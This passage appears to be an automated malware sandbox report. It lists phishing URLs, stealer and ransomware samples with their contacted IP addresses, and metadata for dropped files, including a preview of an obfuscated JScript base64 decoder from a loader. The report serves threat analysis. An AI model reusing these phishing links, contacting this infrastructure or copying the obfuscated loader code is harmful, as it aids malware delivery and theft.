                                                                                                                                                  http://pomservicing.co.uk/pomservicing/Smtb/dGVzdF9tYWlsQGVtYWlsLmpw==%C3%A3%E2%82%AC%E2%80%9A$$%C3%A3%E2%82%AC%E2%80%9A/1/010001943914714a-a13d10fa-2f31-4a50-b2fa-f3854398d733-000000/CAe7zeJgIBBw_nSVrUkbbcG65_c=407Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 69.49.230.198
                                                                                                                                                  Ecastillo-In Service Agreement.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 69.49.230.198
                                                                                                                                                  https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 69.49.230.198
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0e17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  NEW SHIPPING DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  new order.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  NLWfV87ouS.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  542CxvZnI5.dllGet hashmaliciousVirut, WannacryBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  https://cc68b94d-d9d0-4a03-bf37-d58a3335e1ce.p.reviewstudio.com/-/en/b/?_encoding=UTF8&_encoding=UTF8&node=3024314031&bbn=16435051&pd_rd_w=VSdHJ&content-id=amzn1.sym.01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_p=01fcb23a-92a2-4260-b9bf-7c78abf408da&pf_rd_r=E0WD16QK99B55VAWSKBQ&pd_rd_wg=EU3Lj&pd_rd_r=fd3510c2-a6e6-4f59-a468-c59aac80bfa9&ref_=pd_hp_d_btf_unkGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  https://ziyahid.github.io/netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  http://pub-35a1d927529e4c9684409537cf8ff63f.r2.dev/docu/e_protocol.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 162.241.87.113
                                                                                                                                                  • 207.241.227.155
                                                                                                                                                  • 149.154.167.220
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  regsvr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 23.186.113.60
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1616
                                                                                                                                                  Entropy (8bit):5.346184626026755
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:MxHKlYHKh3oPtHo6hAHKzePHcHHHKAHKx1qHxLHVHj:iqlYqh3oPtI6eqzG8nqAqxwRL1D
                                                                                                                                                  MD5:35691637EEF06C3561696DC72CB1281C
                                                                                                                                                  SHA1:BD00A3772D8C98F3318B3CEB8A85AFAA79252B80
                                                                                                                                                  SHA-256:E7C8BB0ED4357F81D6B6FAD015E6767834D693336C561F45ACCFB7B99614B266
                                                                                                                                                  SHA-512:F29AC88B0F592CF26E7B0F6EBC1D0FDE3DAA02F8FCE9D2BF632E6823EC5AA0BA4D6CD2AB801424EF1578E947F00BD1B20A7175B45DFC20A28A317906EAB2FA24
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen
                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (3691), with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6646
                                                                                                                                                  Entropy (8bit):6.2549672622327925
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:V6oidyY18z8U68z8Un8s8Y8I8F8k8/8G88L8D58W3ZP8zq828B8xDm8d8j8N8O8x:Gdyk8z898z8I8s8Y8I8F8k8/8G88L8Da
                                                                                                                                                  MD5:E384965DFEB7E803E2905A2BFA8B4277
                                                                                                                                                  SHA1:4ADAF53441C6C0631B6BC8C2D8E2C06033E9039A
                                                                                                                                                  SHA-256:9B1609B2F9D0531BDF4B2EE71252BFF1466DC2178996419088721BF97E0AD8AF
                                                                                                                                                  SHA-512:FCD4685B99FB32012E4825864BB25D49E8946182C8463D16C1081D0342F9C8B951862F9AB7F7057747EF290FDBF8E4D72E3EA3E6D360D0B0BA9D5289A5729766
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:bottlehead = {.. cacotopia: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",.. decode: function(menstruation) {.. var decodedString = "";.. var drone, whopped, drosky;.. var wholehearted, protosulphate, unknighted, rhapsodised;.. var leucorrhoea = 0;.. menstruation = menstruation.replace(/[^A-Za-z0-9+/=]/g, "");.. while (leucorrhoea < menstruation.length) {.. wholehearted = this.cacotopia.indexOf(menstruation.charAt(leucorrhoea++));.. protosulphate = this.cacotopia.indexOf(menstruation.charAt(leucorrhoea++));.. unknighted = this.cacotopia.indexOf(menstruation.charAt(leucorrhoea++));.. rhapsodised = this.cacotopia.indexOf(menstruation.charAt(leucorrhoea++));.. drone = (wholehearted << 2) | (protosulphate >> 4);.. whopped = ((protosulphate & 15) << 4) | (unknighted >> 2);.. drosky = ((unknighted & 3) << 6) | rhapsodised;.. decodedStri
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9434
                                                                                                                                                  Entropy (8bit):4.928515784730612
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                  MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):64
                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                                                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:@...e................................................@..........
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):60
                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):229376
                                                                                                                                                  Entropy (8bit):0.64343788909108
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:A1zkVmvQhyn+Zoz67dNlIMMz333JGN8j/LKXYj5kuv:AUUMXCyIr
                                                                                                                                                  MD5:B6787B79D64948AAC1D6359AC18AB268
                                                                                                                                                  SHA1:0831EB15AB2B330BE95975A24F8945ED284D0BA4
                                                                                                                                                  SHA-256:9D6FD3B8AB8AA7934C75EDE36CEB9CF4DDAD06C5031E89872B4E814D7DB674E2
                                                                                                                                                  SHA-512:9296866380EF966F1CB6E69B7B84D1A86CD5AE8D9A7332C57543875FAA4FC7F1387A4CF83B7D662E4BAB0381E4AFC9CB9999075EBB497C6756DF770454F3530E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):294912
                                                                                                                                                  Entropy (8bit):0.08436842005578409
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                  MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                  SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                  SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                  SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):98304
                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28672
                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):159744
                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):159744
                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):0.37202887060507356
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
                                                                                                                                                  MD5:4D950F6445B3766514BA266D6B1F3325
                                                                                                                                                  SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
                                                                                                                                                  SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
